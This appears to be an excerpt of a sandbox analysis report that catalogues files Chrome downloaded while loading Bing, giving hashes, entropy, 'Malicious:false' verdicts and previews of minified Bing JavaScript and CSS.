                                                                            Preview:var BingAtWork;(function(n){var t;(function(n){n.fetchLowerHeader=function(n){sj_ajax("/business/lowerheader?q="+n,{callback:function(n,t){var u,r,i,f;n&&(u=_ge("b_content"),u&&(r=u.getElementsByTagName("main"),r&&r.length>0&&(i=r[0],i&&i.hasChildNodes()&&(f=sj_ce("div","b_lowerHeader"),t.appendTo(f),i.insertBefore(f,i.firstChild)))))}})};n.fetchScopeBar=function(n){sj_ajax("/header/scopebar?q="+n,{callback:function(n,t){var i,r,u,f;n&&(i=_ge("b_header"),i&&(r=i.getElementsByTagName("nav"),r&&r.length>0&&(u=r[0],u&&(f=sj_ce("div","b_nav"),t.appendTo(f),i.removeChild(u),i.appendChild(f)))))}})};n.fetchNotificationConditional=function(){sj_ajax("/business/notification/conditional",{callback:function(n,t){n&&t.appendTo(_d.body)}})};n.raiseAuthEventAndLog=function(n){var i=n.isAuthenticated,r=n.postUserNameInMessage,u=n.displayName,f=n.uniqueName,e=n.userObjectId,t;if(!i){sj_evt.fire("aad:signedout");return}t={displayName:u,uniqueName:f,userObjectId:e};r?sj_evt.fire("aad:signedin",t):sj_ev
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (26992), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):26992
                                                                            Entropy (8bit):5.1185827620767315
                                                                            Encrypted:false
                                                                            SSDEEP:384:tVF8JxjM5euIeF1jq3306zxzUw5GyrF8p/0:SxPeFA3nVN
                                                                            MD5:DEA3E03543E1C0F26BF35F491C089B4F
                                                                            SHA1:6D33F7BD59290C21B4BA5A7942E5A9D57929F5B8
                                                                            SHA-256:3DDE43DFB84B2E878399B6664B9F1B15184478F13006ABD86893F9F8476537FE
                                                                            SHA-512:B5423F3BFBC235941B375E33FD44F48F46A0F69C3B84EC479BE4E733B03219805FF2FE234DFE83C1FA7B3AF8AE80AF5000BEC7FD591CC61B57F64EF0D9F288E4
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:"https://r.bing.com/rb/5W/cc,nc/MBJLoxyN_PF81dQjGN3CmwnLArw.css?bu=IGhouwuXD2iyD6oQ4BP_E5sUaGiMFoEf7SFovyaTLGhouCTRBdQFaDicAZwE7QTPRItFaGg&or=w"
                                                                            Preview:z{a:1}z{a:1}html,body #b_results .b_no{background-color:#fff}#b_results>li a{color:#4007a2}#b_results>li a:visited{color:#4007a2}#b_results>li{background-color:#fff}div.b_dropdown .b_selected{background:#e1e0df}#b_tween .b_toggle:hover,#b_tween .ftrH:hover{background:#f2f2f2}.b_scroll{background:#999;border-color:#999}.b_scroll:hover{background:#4d4d4d}.b_dropdown{background-color:#fff;border-color:#e5e5e5}.ctxt,select,input[type="text"]{color:#444;border-color:#ddd}.ccal{border-color:#ddd}.ccal:hover,.ctxt:hover,select:hover,input[type="text"]:hover{box-shadow:0 1px 2px 0 rgba(0,0,0,.1)}.ctxt:focus,select:focus,input[type="text"]:focus{color:#444;border-color:#919191;box-shadow:0 1px 2px 0 rgba(0,0,0,.1)}.ccal input[type="text"],.ccal input[type="text"]:hover,.ccal input[type="text"]:focus{color:#444}.ccal.ccal_rfs input[type="text"],.ccal.ccal_rfs input[type="text"]:hover,.ccal.ccal_rfs input[type="text"]:focus{color:#666}label{color:#767676}#b_results ::placeholder{color:#767676;opa
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (8674), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):8674
                                                                            Entropy (8bit):5.212727429542033
                                                                            Encrypted:false
                                                                            SSDEEP:192:a4/1MfRZ4V9bmVKnhHKBEs9F3kBlVD+mxHpfuq:ac1MfRkHpiEs9dkBfDLJfuq
                                                                            MD5:1C0981AC86E2EA5B7F08F34548AF3280
                                                                            SHA1:57324208DDB3A9E80ABD3346607D712C999C2E50
                                                                            SHA-256:00FF3483D93259AEDB929A9FEE4454A623830B18A08F08781AC1961C1E98774A
                                                                            SHA-512:0F7185A8579D9BF1B89623BF126C58789010C76F7E279A3F44064C78B2E3E04BB0A89394E6BE185618071153BC872E43A69211255F3470E1120E51AB0D5F2329
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/VzJCCN2zqegKvTNGYH1xLJmcLlA.js
                                                                            Preview:(function(n,t,i,r,u,f,e,o,s){function w(n,t,i){var r=[],u;return n&&(i=i||"*",u=n.getElementsByTagName(i),h(u,function(n){nt(n,t)&&r.push(n)})),r}function b(n,t,i){var r=[];return h(n,function(n){var u=w(n,t,i);u&&u.length>0&&(r=r.concat(u))}),r}function bt(n,t){var i=[];return h(n,function(n){var r=null;try{r=n.querySelector(t)}finally{r&&(i=i.concat(r))}}),i}function ut(n){return g[n]||(g[n]=new RegExp("\\b"+n+"\\b")),g[n]}function nt(n,t){var i=n.className||"";return ut(t).test(i)}function y(n,t){n.className=n.className||"";nt(n,t)||(n.className+=" "+t)}function p(n,t){var i=n.className||"",r=ut(t);n&&i&&t&&(n.className=n.className.replace(r,"").replace(/\s+/," "))}function a(n){return f(n),u(n),!1}function kt(n){return(n=n||i.event,n.pageX||n.pageY)?{x:n.pageX,y:n.pageY}:{x:n.clientX+s.scrollLeft-s.clientLeft,y:n.clientY+s.scrollTop-s.clientTop}}function c(n,t){var i=n.currentStyle,r=0,u;return _w.getComputedStyle&&(i=_w.getComputedStyle(n),sb_ie&&(r=parseFloat(i.paddingTop)+parseF
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (560), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):560
                                                                            Entropy (8bit):4.742600822971018
                                                                            Encrypted:false
                                                                            SSDEEP:12:CFmwsCfyMJoAfrk3bV0tRWERW5kTGb3aINVN/t/jgClRXirA:CFmNWaAwRCRWERW5kTGb3l1tMClRd
                                                                            MD5:9B28631B7C46706DBB7EEF2D16D9549B
                                                                            SHA1:2A463D97AF924D3B10C250181D0D902562494184
                                                                            SHA-256:F8FA36AB6505DA51BEF5521EF84793391BE9C16DE5ABD6BB99C20FE4D1FB48CF
                                                                            SHA-512:9E85DB806D0CBEEC5007D0AB90BEFA6CB036995110637EC616D93FCC4A2A9BAF59BB0ABEF98913E5D9FD88BE445C9ABC04E0B6C7533E4384F945CB743A4CF488
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var Lib;(function(n){var t;(function(n){function t(n){return n&&n.classList}function i(n,i){t(n)&&n.classList.add(i)}function r(n,i){t(n)&&n.classList.remove(i)}function u(n,i){t(n)&&n.classList.toggle(i)}function f(n,i){return t(n)&&n.classList.contains(i)}function e(n,t){return n.getElementsByClassName?n.getElementsByClassName(t):null}function o(n){return n instanceof SVGElement?n.getAttribute("class"):n.className}n.add=i;n.remove=r;n.toggle=u;n.contains=f;n.getElementByClassName=e;n.getClassAttribute=o})(t=n.CssClass||(n.CssClass={}))})(Lib||(Lib={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (7155), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):7155
                                                                            Entropy (8bit):5.435598317550486
                                                                            Encrypted:false
                                                                            SSDEEP:192:paWT3REjhNn5y1Myoy+y25syZWNKo5xp5VUILj/rVEkVu4akUr:paWzEhNn5y1Myoy+y25syq/VUIX/1aka
                                                                            MD5:DC221228E109F89B8B10C48F2678FB46
                                                                            SHA1:1BFC85CBA5C424136941AC1DFD779A563B5BEED4
                                                                            SHA-256:F4FB7234959F48C2B2CA73FD6C35D36EAF65D8C431D982A1BA208F5CDC766419
                                                                            SHA-512:46F49E5AC18436251778D1F50C027729A2442ED6541C3162D878720703E37797B6028D96EB1568C23EC5006FB022C8E05855E250D6A1A590F41E890866529CD2
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var QuickSearch;(function(n){function et(n){var t=_w.location.protocol+"//"+_w.location.hostname+"/chat?q="+encodeURIComponent(n)+"&showconv=1&sendquery=1&form=IPRV10";a?window.open(t):_w.location.href=t}function w(n){sb_st(function(){var it,rt,ut,ft,f,a,w,st,d,at,s,v,g,vt,ht,y,p,ct,nt;if(l=null,NodeList.prototype.forEach||(NodeList.prototype.forEach=function(n,t){t=t||window;for(var i=0;i<this.length;i++)n.call(t,this[i],i,this)}),f=window.getSelection(),t=(it=f===null||f===void 0?void 0:f.toString())!==null&&it!==void 0?it:"",a=_ge("qs_searchBox"),w=o?_ge("mfa_root"):null,!o||w!=null){var lt,et=!0;f!=null&&f.anchorNode!=null&&(lt=f.anchorNode.nodeValue||f.anchorNode.textContent,et=!tt.some(function(n){return n!=null&&n!=undefined?n.contains(f.anchorNode):!1}),f.anchorNode.childNodes!=null&&f.anchorNode.childNodes.forEach(function(n){(n.nodeName==="INPUT"||n.nodeName==="TEXTAREA")&&(et=!1)}));st=!0;dt()||f.type=="Range"||(st=!1);t.trim()!=""&&et&&st&&u&&t.trim().length<2048?(sj_log("C
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (667), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):667
                                                                            Entropy (8bit):5.251512275863699
                                                                            Encrypted:false
                                                                            SSDEEP:12:fr5esz7hNGwXI2QA3QglxfLQOtKfWM1kI2JGC+t5821xw9i/UJpN0I:fr5NhNGOgAggDDQOtjMbhH582Ugk0I
                                                                            MD5:2AB12BF4A9E00A1F96849EBB31E03D48
                                                                            SHA1:7214619173C4EC069BE1FF00DD61092FD2981AF0
                                                                            SHA-256:F8B5ACF4DA28E0617F1C81093192D044BD5A6CC2A2E0C77677F859ADCF3430AC
                                                                            SHA-512:7D5AAE775BE1E482EADA1F453BEA2C52A62C552FA94949E6A6081F322E679E916B1276BB59FF28CF7C86D21727BCC329ECB03E5D77CA93204E0CD2694FAA72BD
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:sb_ie&&function(){function h(){if(t){var u=n.replace(/www\./i,"");return f&&i(t,r,n+"?PC="+f)||i(t,r,n)||i(t,r,u)||i(t,r,n+"?Form=HPPDH1")||i(t,r,n+"?PC=BNHP")||i(t,r,n+"?PC=BNSR")}return 0}function c(){return i(_w.external,s,n)!=0}function l(){if(u){var n=2*e+o;if(u==n)return!0}return!1}function a(){var n=_ge("hps");return n||(n=sj_ce("span","hps"),n.style.behavior="url(#default#homepage)",sj_b.appendChild(n)),n}function i(n,t,i){try{return n[t](i)}catch(r){return 0}}var s="IsSearchProviderInstalled",r="isHomepage",n="http://"+_d.domain+"/",u=sj_cook.get("_UR","D"),f=sj_cook.get("SRCHS","PC"),t=a(),e=h(),o=c();l()||(u=2*e+o,sj_cook.set("_UR","D",u,1,"/"))}()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1274), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):1274
                                                                            Entropy (8bit):5.30620342636407
                                                                            Encrypted:false
                                                                            SSDEEP:24:+Fq4YTsQF61KWllWeM2lSoiLKiUfpIYdk+fzWPn8X0kdo6QBUf4JPwk:+FGF6UYXEBi9k5P8OPUY
                                                                            MD5:A969230A51DBA5AB5ADF5877BCC28CFA
                                                                            SHA1:7C4CDC6B86CA3B8A51BA585594EA1AB7B78B8265
                                                                            SHA-256:8E572950CBDA0558F7B9563CE4F5017E06BC9C262CF487E33927A948F8D78F7F
                                                                            SHA-512:F45B08818A54C5FD54712C28EB2AC3417EEA971C653049108E8809D078F6DD0560C873CEB09C8816ECD08112A007C13D850E2791F62C01D68518B3C3D0ACCCEB
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/fEzca4bKO4pRulhVlOoat7eLgmU.js
                                                                            Preview:var Identity=Identity||{};(function(n,t,i,r,u,f,e){e.wlProfile=function(){var r=sj_cook.get,u="WLS",t=r(u,"N"),i=r(u,"C");return i&&e.wlImgSm&&e.wlImgLg?{displayName:t?t.replace(/\+/g," "):"",name:n(t.replace(/\+/g," ")),img:e.wlImgSm.replace(/\{0\}/g,f(i)),imgL:e.wlImgLg.replace(/\{0\}/g,f(i)),idp:"WL"}:null};e.headerLoginMode=0;e.popupAuthenticate=function(n,i,r){var o,u,h,c,v=sb_gt(),l=Math.floor(v/1e3).toString(),s="ct",a=new RegExp("([?&])"+s+"=.*?(&|$)","i");return n.toString()==="WindowsLiveId"&&(o=e.popupLoginUrls,u=o[n],u=u.match(a)?u.replace(a,"$1"+s+"="+l+"$2"):u+"?"+s+"="+l,e.popupLoginUrls.WindowsLiveId=u),(o=e.popupLoginUrls)&&(u=o[n]+(i?"&perms="+f(i):"")+(r?"&src="+f(r):""))&&(h=e.pop(u))&&(c=setInterval(function(){h.closed&&(t.fire("id:popup:close"),clearInterval(c))},100))};e.pop=function(n){return r.open(n,"idl","location=no,menubar=no,resizable=no,scrollbars=yes,status=no,titlebar=no,toolbar=no,width=1000,height=620")};var s=u("id_h"),o=u("id_l"),h="click";t.bind("o
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):64
                                                                            Entropy (8bit):4.578223149067329
                                                                            Encrypted:false
                                                                            SSDEEP:3:2LGff6dCD1KOYKpmBhJeVlu:2LGX6dAAOYKmXJl
                                                                            MD5:A4514E4EDB31D874583B43D2E53E3620
                                                                            SHA1:55AC469678B62EB69C5E3F1C3D78A63D703CD70A
                                                                            SHA-256:A5A84A25FFDF1B34A268A98C8C8484BA773360CC4F9FADD526A4C7932677F088
                                                                            SHA-512:1890AD66EE5CC00D70445B13849F0C8E71FAAD5D3BEA610966617ED4C48B9418AC640C9EAD310853E30E6611E6FB7771B1DFB1E3BAD86010B5C34101A86D4D02
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/VaxGlni2LracXj8cPXimPXA81wo.js
                                                                            Preview:(function(){_w.sj_log&&sj_log("Info","ClientDimNotSent","1")})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):150
                                                                            Entropy (8bit):4.600177297188171
                                                                            Encrypted:false
                                                                            SSDEEP:3:GRkvpONL8MWsjKRJHac2RkvpONL8MWsjKZ46bEt:GRkONL8Bs2RojRkONL8Bs2Z46Y
                                                                            MD5:3664B929C69063F30C602FE5AE92AF24
                                                                            SHA1:8E0FD8BDA6EA43D0772ED4E3EACA202521CB8E16
                                                                            SHA-256:D2CF2B153C0D1083FA99595BAE8CCB26256C1F6ABA7EE6ACDC13681301AF56A3
                                                                            SHA-512:8B256AE92CFE52478BB041F604D89402E6F3D595FCFAFA2C53046D589F88815FC9D0FF101DAA35EE4F505ADCFCCC654C6012E388F7757B1A0AF1F3987C80129E
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/jg_YvabqQ9B3LtTj6sogJSHLjhY.css
                                                                            Preview:body:not(.b_sydConvMode) .b_scopebar #b-scopeListItem-conv svg,body:not(.b_sydConvMode) .b_scopebar #b-scopeListItem-conv .scp_conv_mode{display:none}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Unicode text, UTF-8 text, with very long lines (2014), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2016
                                                                            Entropy (8bit):5.3161096027675105
                                                                            Encrypted:false
                                                                            SSDEEP:48:bnXL8sjfZ/Fslrgj3rzIRlK0KqoLi7XSOLFTt+jCz1T9XNZTs3Gan/An0:bnoshqlMQRlZTolKOEXNZsWan/An0
                                                                            MD5:D807DBBB6EE3A78027DC7075E0B593FF
                                                                            SHA1:27109CD41F6B1F2084C81B5D375EA811E51AC567
                                                                            SHA-256:0ACDCE370092C141B0C6617ED6E2163F04BB9B93D3213B62C2BC7A46FE0243C7
                                                                            SHA-512:E037DFC31D595B459660FE7D938EEDB4F43D208D247174EE8D6FD0D125F211142CD73497E4601893CECB6F565B7E2E7815CE416D72BB95504D3F277E4E806D11
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var SerpKeyboardNavigation;(function(){function c(){h=_d.activeElement;n=null;u=null;e=!1;t=-1;nt();u=_w.NavSelector&&NavSelector(!1)}function p(){v();n=null}function w(i){var e,h,o;i&&(e=_d.activeElement,h=s&&e&&e.className&&e.className.indexOf("feedback-binded")!==-1,i.keyCode==r.Tab&&s&&(f("TOP"),s=!1),u&&e&&e.className!=="b_searchbox"&&!h&&(i.keyCode==r.Enter?(n=null,f(t==-1?"EN":"EE",t)):b(i)&&(o=k(i.keyCode),o!==-1&&o!==t&&(tt(o),sj_pd(i)))))}function f(n,t){sj_log("CI.SerpKeyboardNav",n,t?t.toString():"")}function b(t){var i,r=(i=_d.querySelector("#b_sydConvCont cib-serp"))===null||i===void 0?void 0:i.getAttribute("mode");return n||h==_d.activeElement?t.altKey||t.ctrlKey?!1:r&&["conversation","notebook"].includes(r)?!1:!0:!1}function k(n){if(n===r.Tab)return d();if(n===r.Down||n===r.Up){var t=document.activeElement;return t&&(t.tagName.toLowerCase()==="select"||t.tagName.toLowerCase()==="input")?-1:g(n===r.Down)}return-1}function d(){var i=-1;return n?(v(),e=!0,t=-1,f("TO")):(i=
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (739), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):739
                                                                            Entropy (8bit):5.152908569852501
                                                                            Encrypted:false
                                                                            SSDEEP:12:2Q83RWcRSWm/LwZZ06ruc/Jj6rP4W/pDm9Nn/pDtO7gjl0OuMtokw1fRGy8XHnu:2QQRWOSWm/IF67r4uYD/jO7a2e+kw1ff
                                                                            MD5:D63DC48463B90F3B30A5CAC5A4AABDE4
                                                                            SHA1:86C70A354A2BD42493BA78F88760CCEF1100C203
                                                                            SHA-256:47D20F8C99C06028167C9B2578691263F0EEA547F5741508838EB937E4878C54
                                                                            SHA-512:10425331F9BF32F3F4620A527AC0B43C697921F5F2940562FD4DACAF2F881AE4D8A7BFA85E284ED1DB183AEC2EEE46B3616F69C8BC1293102A70C97B51B999C2
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/hscKNUor1CSTunj4h2DM7xEAwgM.js
                                                                            Preview:(function(){function t(){for(var t,u,r=_d.getElementsByTagName("A"),i=0;i<r.length;i++)if(t=r[i].getAttribute("href"),r[i].getAttribute("target")!="_blank")if(t&&(t.startsWith("/")||t.indexOf(".bing.com")>=0)){for(u=0;u<n.length;u++)if(t.startsWith(n[u])||t.indexOf(".bing.com"+n[u])>=0){r[i].setAttribute("target","_blank");break}}else t&&t.startsWith("http")&&r[i].setAttribute("target","_blank");Log&&sj_cook&&Log.Log("NewTab","Client",sj_cook.get("SRCHHPGUSR","EXLKNT"),!1)}var n=["/ac","/clk","/ck","/rebates","/images","/shop","/news","/videos","/alink/link","/spotlight","/dict","/academic","/travel","/jobs","/translator","/product","/cricketdetails","/local","/school","/new","/map","/work","/homes"];t();sj_evt.bind("onP1",t)})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (991), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):991
                                                                            Entropy (8bit):4.966336813869138
                                                                            Encrypted:false
                                                                            SSDEEP:24:getalfQZXMIrCvsAHOVHOObKHJyK2tLpLJLd:ZAZIrCvjH4HcHu/
                                                                            MD5:BB00606FD6AFEB59E604235E5FBF2D22
                                                                            SHA1:6C3379827C0E9F3C803CC05E2BD5E6CF2915AD2A
                                                                            SHA-256:0FB0CCBE6C6966192F244FD9FDA1E4B49C9388B46D70E1476D8B645045B771D9
                                                                            SHA-512:39AC8EB3365A2D9779E74DDE4B9BCA1642E666A215F91D1AF787DC987BCCEADEFA9D07B44AE6329CE790D261ACEC852E1F2827EA172A774A9CDFF1C3EF246E47
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/bDN5gnwOnzyAPMBeK9XmzykVrSo.css
                                                                            Preview:#id_rh_w{position:relative}#rh_rwm{display:inline-block}#rh_rwm.maps{display:contents}#rh_rwm.maps:not(.rw-dark){--rw-medal-color:#106ebe}#rh_rwm.hp{--rw-medal-color:#fff;--rw-font-color:#fff;display:inline-block;margin:2px 6px 0;height:42px}.gih_pink #rh_rwm{--rw-medal-color:#e63887;--rw-font-color:#fff}#rh_rwm.hp .points-container{color:#fff;color:var(--rw-color,var(--rw-font-color))}#rh_rwm span{fill:#919191;fill:var(--rw-color,var(--rw-medal-color))}#rh_rwm path{fill:#919191;fill:var(--rw-color,var(--rw-medal-color))}#rh_rwm .red-dot{background-color:#c80000;background-color:var(--rw-red-dot-color)}#rh_rwm circle{stroke:#919191;stroke:var(--rw-color,var(--rw-medal-color))}#rh_rwm.serp{margin-left:16px;height:50px}#rh_rwm.hide{display:none}@media(max-width:1274.9px){body:not(.b_norr) #rh_rwm.serp{margin-right:12px;margin-left:8px}body.b_norr #rh_rwm.serp{margin-right:0;margin-left:0}body.b_norr #id_rh_w{margin:0}}#rh_rwm.spotlight{--rw-medal-color:#fff;--rw-font-color:#fff}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):270
                                                                            Entropy (8bit):4.899712383560328
                                                                            Encrypted:false
                                                                            SSDEEP:6:qOvsy8CemDvMX3idAb/pR7SAb9kvRqaI7sy8Q7sy8oRHsy8+cs:t+ydjIkvRrIXpRHNcs
                                                                            MD5:EB205AD97C03FF1F0FA4E8181A33ABFA
                                                                            SHA1:D2D31430F1BA4BD909684FC0FCB3C5D866CABBA1
                                                                            SHA-256:E0FC19557FC40013231E79254059B16AA64019202372077962AD0345F6434CD1
                                                                            SHA-512:C1793630AACBC4203F7911E41A07EF941BA96E0A6C20A13DCED139DEA3E2F6EDAD9CFE86001D467A58709D2F3441C6154C26670C163A5209F1DA1516869AA6E3
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/0tMUMPG6S9kJaE_A_LPF2GbKu6E.js
                                                                            Preview:var SHPromptForUserLocation;(function(n){function t(n,t){var i="AutoPrompt";SHwlochelper.log("DevLoc",i,"PromptDevLoc");SHgetlochelper.tgL(!0,null,t,i,n,null,null)}n.init=t})(SHPromptForUserLocation||(SHPromptForUserLocation={}));sj_evt.fire("promptForUserLocationInit")
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):274
                                                                            Entropy (8bit):5.183310044763656
                                                                            Encrypted:false
                                                                            SSDEEP:6:qNVDvMdCOEy4N7M1LDKENosMxFC7KD/xRuMVsman:wpGRGN7k60osMxF5CMVsman
                                                                            MD5:08CAA80B9EBEDD92F3B935AB00AE92EE
                                                                            SHA1:D795BB0FA8604D0A0F0F9550B0DC6046794A7501
                                                                            SHA-256:E2DE191955DB0403BC58126B270E891F5FD7C2BE9EB78DC07C893C10F87CEBA2
                                                                            SHA-512:683C328377D7F435FD18A85A65585F06E3F232E066E72AFCBF54402A1B1A1153E51AA94E479C22915A98BB7CAB9F3D7D9C0EE3305AFB9670AF5EAEE56612E2F4
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/15W7D6hgTQoPD5VQsNxgRnlKdQE.js
                                                                            Preview:var SearchBox;(function(n){function u(){t=_ge("b_header");sj_be(_d.body,"click",i)}function i(n){var i=sj_et(n);i.id!="sb_form_q"&&(t.className=t.className.replace(r,""))}var r=/(^|\s)b_focus(?!\S)/gi,t;n.removeFocusClass=i;sj_evt.bind("onP1",u)})(SearchBox||(SearchBox={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (7179)
                                                                            Category:dropped
                                                                            Size (bytes):7180
                                                                            Entropy (8bit):5.161749091368312
                                                                            Encrypted:false
                                                                            SSDEEP:192:HA1SI+LtL5XIr10Tjyf8J+Bz9NgR51fuPKZs7f/:g1SIiXhqabao6/
                                                                            MD5:8E28DB3A65522AE2012DE9ADCE4DE5BF
                                                                            SHA1:84EA63544DA64A2355256B0BAE973AE1EAE04CE6
                                                                            SHA-256:ADF7F9B0DD938575C72FF1592EA18E7AB9BC53FF8838A38C8484C10F5D9BE7FD
                                                                            SHA-512:4319C5B3C4B880ADE6E25B28609A14152389CC8D835AD213D58984153C3E7FF8718B2829A330A7EA4F2C11DB68C358438563FB301D9D6240BF833CEE1462756C
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var webVitals=function(e){"use strict";var n,t,r,i,o,a=-1,c=function(e){addEventListener("pageshow",(function(n){n.persisted&&(a=n.timeStamp,e(n))}),!0)},u=function(){var e=self.performance&&performance.getEntriesByType&&performance.getEntriesByType("navigation")[0];if(e&&e.responseStart>0&&e.responseStart<performance.now())return e},s=function(){var e=u();return e&&e.activationStart||0},f=function(e,n){var t=u(),r="navigate";a>=0?r="back-forward-cache":t&&(document.prerendering||s()>0?r="prerender":document.wasDiscarded?r="restore":t.type&&(r=t.type.replace(/_/g,"-")));return{name:e,value:void 0===n?-1:n,rating:"good",delta:0,entries:[],id:"v4-".concat(Date.now(),"-").concat(Math.floor(8999999999999*Math.random())+1e12),navigationType:r}},d=function(e,n,t){try{if(PerformanceObserver.supportedEntryTypes.includes(e)){var r=new PerformanceObserver((function(e){Promise.resolve().then((function(){n(e.getEntries())}))}));return r.observe(Object.assign({type:e,buffered:!0},t||{})),r}}catch(e
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (684), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):684
                                                                            Entropy (8bit):5.166363591063823
                                                                            Encrypted:false
                                                                            SSDEEP:12:2Q12lkSF3mVwl/BJWhuSpOYkM3+Pu1w2E1fNPrQ5uj5lD+QgAjTYCXPrQuN:2Q1QkSFr5BJupODpfPrQ8Dn/XPrQuN
                                                                            MD5:C1D04951E98B892931D4C2BC34555057
                                                                            SHA1:55E6297F3499B4961C8E956F7F088868CD59C769
                                                                            SHA-256:7C317940549467B3210D2F72DA000BAC3481ABFDE3AC5358D398EB64DCBC8532
                                                                            SHA-512:D427487C00AF5E8D9DB222F8A01521A5C8646AE8E459D517443DAC8EF2DBEC2DDEA91877B095B82CF3E52031E1650C7360811ED8A06E02F85E3517974D36AD96
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/VeYpfzSZtJYcjpVvfwiIaM1Zx2k.js
                                                                            Preview:(function(){var n,i=(new Date).getTime(),t=_G!==undefined&&_G.RTO!==undefined?_G.RTO:null,r=((n=_G===null||_G===void 0?void 0:_G.EF)===null||n===void 0?void 0:n.infrefcflog)===1;t!=null&&(window.history.scrollRestoration="auto",document.addEventListener("visibilitychange",function(){if(document.visibilityState==="visible"&&window.location.href.indexOf("/search")>=0&&(new Date).getTime()-i>t&&(Log&&Log.Log&&Log.Log("NTRef","DayRefresh","Active"),!r)){var n=window.location.href+(window.location.href.indexOf("dayref=1")<0?"&dayref=1":"");window.location.href=n}}),typeof setTimeout!="undefined"&&setTimeout(function(){Log&&Log.Log&&Log.Log("NTRef","DayRefresh","Inactive")},t))})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (655), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):655
                                                                            Entropy (8bit):5.099317890582633
                                                                            Encrypted:false
                                                                            SSDEEP:12:hFzzqZv5xq5AkrF8TXIiexy0qcwvgPnwnB5OM+DPYqQRXK:hFzzoC+kFQ4iex25+wB5OZsqQRXK
                                                                            MD5:3E4EDB2EB04A481FA178A913B0BE387A
                                                                            SHA1:1261BE5CC20C09CABCCE67150413BB8E41444401
                                                                            SHA-256:2D4A25AD08E943D4EA3F7FA7C1B17350EF6759B8C99FAC2501F9B1920F2E9B48
                                                                            SHA-512:96605553E8EAC4F95033242EC19F79A80D2F42D36BB01D564073CCDD6D78F509DD9046EDAD7EA5F6A02F1718AE927002F424DAFD9F61D30F44C66CD898B2953B
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rs/6r/lN/nj/EmG-XMIMCcq8zmcVBBO7jkFERAE.js?or=w
                                                                            Preview:var sj_ajax=function(n,t){function c(){i[u]=h;i.abort&&i.abort()}function s(n,t){typeof n=="function"&&n(t,{request:i,appendTo:function(n){i&&sj_appHTML(n,i.responseText)}})}var r,i=sj_gx(),u="onreadystatechange",f,e=null,o,l=sb_st,a=sb_ct,h=function(){};if(!n||!i){s(r,!1);return}i.open("get",n,!0);t&&(r=t.callback,f=t.timeout,o=t.headers,Object.keys(o||{}).forEach(function(n){i.setRequestHeader(n,o[n])}),t.withCredentials!==undefined&&(i.withCredentials=t.withCredentials));i[u]=function(){if(i.readyState===4){var n=!1;e!==null&&a(e);i.status===200&&(n=!0,i[u]=h);s(r,n)}};sj_evt.bind("ajax.unload",c);i.send();f>0&&(e=l(function(){c();s(r,!1)},f))}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (19674), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):19674
                                                                            Entropy (8bit):5.33240026231163
                                                                            Encrypted:false
